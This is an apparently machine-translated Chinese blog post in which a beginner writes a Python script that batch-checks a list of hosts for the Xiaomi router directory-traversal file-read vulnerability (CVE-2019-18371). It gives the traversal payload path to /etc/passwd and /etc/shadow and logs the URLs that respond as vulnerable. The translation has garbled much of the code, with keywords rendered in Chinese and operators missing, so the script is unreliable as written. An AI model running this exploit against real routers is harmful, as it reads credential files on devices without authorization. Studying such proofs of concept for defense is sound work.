python漏洞利用,python漏洞扫描器代码

  python漏洞利用,python漏洞扫描器代码

  本文主要介绍使用Python编写漏洞验证脚本。本文与您分享一个完整的示例代码。代码简单易懂,对你的学习或工作有一定的参考价值。有需要的朋友可以参考一下。

  小白尝试编写任何文件来读取poc。

  我是个小白,根本不懂Python,但Python往往是渗透的重要角色。

  有一百万个CSDN老板写过这样一句话。不会编程的渗透都是耍流氓。

  虽然喜欢,但也想尝试学习写Python漏洞的poc和exp。

  我是在网上找到学习方法的,可以直接记录下来。试着写一个poc,用于漏洞的批量验证。

  发现小米路由器有一个任意文件读取漏洞,就学会写了。

  小米路由器远程任意文件读取漏洞

  小米远程任意文件读取漏洞(CVE-2019-18371)

  小米路由器Nginx的配置文件错误,导致目录遍历漏洞实现任意文件读取。

  可以访问http://domain.cn/xxx…/etc/passwd实现目录遍历访问上级目录及其子目录。

  可以通过访问http://192 . 168 . 1 . 1/API-third-party/download/ext disks…/etc/passwd来读取passwd文件。

  编写一个poc,用于漏洞的批量验证。

  第一步是拼接域名和有效载荷。

  payload=/API-third-party/download/ext disks…/etc/passwd已知。

  域名和有效载荷拼接如下

  导入请求

  导入时间

  def poc_check(poc):

  对于打开的网址( xiaomi.txt):

  url=url.replace(\n ,)

  url=url poc

  Print(poc_url) #将域名和有效载荷拼接成一个完整的域名,然后请求如果返回200,说明存在漏洞。

  if __name__==__main__:

  POC _ Xiaomi=/API-第三方/download/extdisks./etc/shadow

  POC _ check(POC _小米)

  图片如下

  拼接域名尝试访问,如果返回200,说明访问成功,说明文件可以读取,说明存在漏洞。

  返回的其他状态代码表明没有漏洞。

  完整的代码如下:

  导入请求

  导入时间

  def poc_check(poc):

  对于打开的网址( xiaomi.txt):

  url=url.replace(\n ,)

  url=url poc

  # print(poc_url) #将域名和有效载荷拼接成一个完整的域名,然后请求如果返回200,则存在漏洞。

  尝试:

  印刷品(《不再留恋夕阳》)

  打印(“检测:”)

  打印(poc_url)

  poc_data=requests.get(poc_url)

  如果poc_data.status_code==200:

  print(POC _ data . content . decode( utf-8 ))

  用open(rxiaomivuln.txt , a )作为f:

  f.write(poc_url \n )

  f.close()

  e:除外

  时间.睡眠(0.1)

  及格

  if __name__==__main__:

  POC _ Xiaomi=/API-第三方/download/extdisks./etc/shadow

  # POC _ Xiaomi 1=/API-第三方/download/extdisks./etc/passwd

  POC _ check(POC _小米)

  # poc_check(poc_xiaomi1)

  结束了。我太笨了。我是根据别人写的。

  关于用Python编写漏洞验证脚本的这篇文章到此为止。有关Python验证脚本的更多信息,请搜索热门IT软件开发工作室之前的文章或继续浏览下面的相关文章。希望大家以后多多支持热门IT软件开发工作室!

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: